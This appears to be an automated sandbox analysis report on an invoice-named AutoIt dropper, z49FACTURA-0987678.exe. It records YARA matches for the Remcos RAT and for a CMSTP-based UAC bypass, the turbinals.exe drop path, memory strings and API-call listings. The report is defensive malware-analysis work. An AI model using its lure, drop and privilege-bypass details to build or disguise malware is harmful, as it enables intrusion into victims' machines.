                    Source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: This is a third-party compiled AutoIt script.0_2_00ED3B3A
                    Source: z49FACTURA-0987678.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: z49FACTURA-0987678.exe, 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_56942521-6
                    Source: z49FACTURA-0987678.exe, 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7a832acd-b
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: This is a third-party compiled AutoIt script.2_2_00CE3B3A
                    Source: turbinals.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: turbinals.exe, 00000002.00000002.1311968489.0000000000D94000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2acf2a4b-5
                    Source: turbinals.exe, 00000002.00000002.1311968489.0000000000D94000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e552c51a-f
                    Source: turbinals.exe, 00000003.00000002.3756168869.0000000000D94000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4adc13e3-4
                    Source: turbinals.exe, 00000003.00000002.3756168869.0000000000D94000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_35a9b303-3
                    Source: turbinals.exe, 00000009.00000002.1436715774.0000000000D94000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8ac3d1b3-b
                    Source: turbinals.exe, 00000009.00000002.1436715774.0000000000D94000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_aec1d703-3
                    Source: turbinals.exe, 0000000A.00000002.1447345247.0000000000D94000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_565e6783-0
                    Source: turbinals.exe, 0000000A.00000002.1447345247.0000000000D94000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_ec9b84cb-7
                    Source: turbinals.exe, 0000000B.00000002.1457239744.0000000000D94000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0e4c0c45-8
                    Source: turbinals.exe, 0000000B.00000002.1457239744.0000000000D94000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_06e76a40-f
                    Source: turbinals.exe, 0000000D.00000002.1464688620.0000000000D94000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a663b399-2
                    Source: turbinals.exe, 0000000D.00000002.1464688620.0000000000D94000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_47043c69-7
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00ED3633
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5C1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00F5C1AC
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00F5C498
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5C5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00F5C5FE
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5C57D SendMessageW,NtdllDialogWndProc_W,0_2_00F5C57D
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5C8BE NtdllDialogWndProc_W,0_2_00F5C8BE
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5C88F NtdllDialogWndProc_W,0_2_00F5C88F
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5C860 NtdllDialogWndProc_W,0_2_00F5C860
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5C93E ClientToScreen,NtdllDialogWndProc_W,0_2_00F5C93E
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5C909 NtdllDialogWndProc_W,0_2_00F5C909
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F5CABC
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5CA7C GetWindowLongW,NtdllDialogWndProc_W,0_2_00F5CA7C
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74D2C8D0,NtdllDialogWndProc_W,0_2_00ED1287
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00ED1290
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5D3B8 NtdllDialogWndProc_W,0_2_00F5D3B8
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5D43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00F5D43E
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED16DE GetParent,NtdllDialogWndProc_W,0_2_00ED16DE
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED16B5 NtdllDialogWndProc_W,0_2_00ED16B5
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED167D NtdllDialogWndProc_W,0_2_00ED167D
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5D78C NtdllDialogWndProc_W,0_2_00F5D78C
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED189B NtdllDialogWndProc_W,0_2_00ED189B
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5BC5D NtdllDialogWndProc_W,CallWindowProcW,0_2_00F5BC5D
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5BF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00F5BF8C
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5BF30 NtdllDialogWndProc_W,0_2_00F5BF30
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CE3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00CE3633
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6C1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_00D6C1AC
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_00D6C498
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6C5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_00D6C5FE
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6C57D SendMessageW,NtdllDialogWndProc_W,2_2_00D6C57D
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6C88F NtdllDialogWndProc_W,2_2_00D6C88F
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6C8BE NtdllDialogWndProc_W,2_2_00D6C8BE
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6C860 NtdllDialogWndProc_W,2_2_00D6C860
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6C909 NtdllDialogWndProc_W,2_2_00D6C909
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6C93E ClientToScreen,NtdllDialogWndProc_W,2_2_00D6C93E
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00D6CABC
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6CA7C GetWindowLongW,NtdllDialogWndProc_W,2_2_00D6CA7C
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CE1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74D2C8D0,NtdllDialogWndProc_W,2_2_00CE1287
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CE1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,2_2_00CE1290
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6D3B8 NtdllDialogWndProc_W,2_2_00D6D3B8
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6D43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,2_2_00D6D43E
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CE16DE GetParent,NtdllDialogWndProc_W,2_2_00CE16DE
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CE16B5 NtdllDialogWndProc_W,2_2_00CE16B5
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CE167D NtdllDialogWndProc_W,2_2_00CE167D
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6D78C NtdllDialogWndProc_W,2_2_00D6D78C
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CE189B NtdllDialogWndProc_W,2_2_00CE189B
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6BC5D NtdllDialogWndProc_W,CallWindowProcW,2_2_00D6BC5D
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6BF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_00D6BF8C
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6BF30 NtdllDialogWndProc_W,2_2_00D6BF30
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00F3A1EF
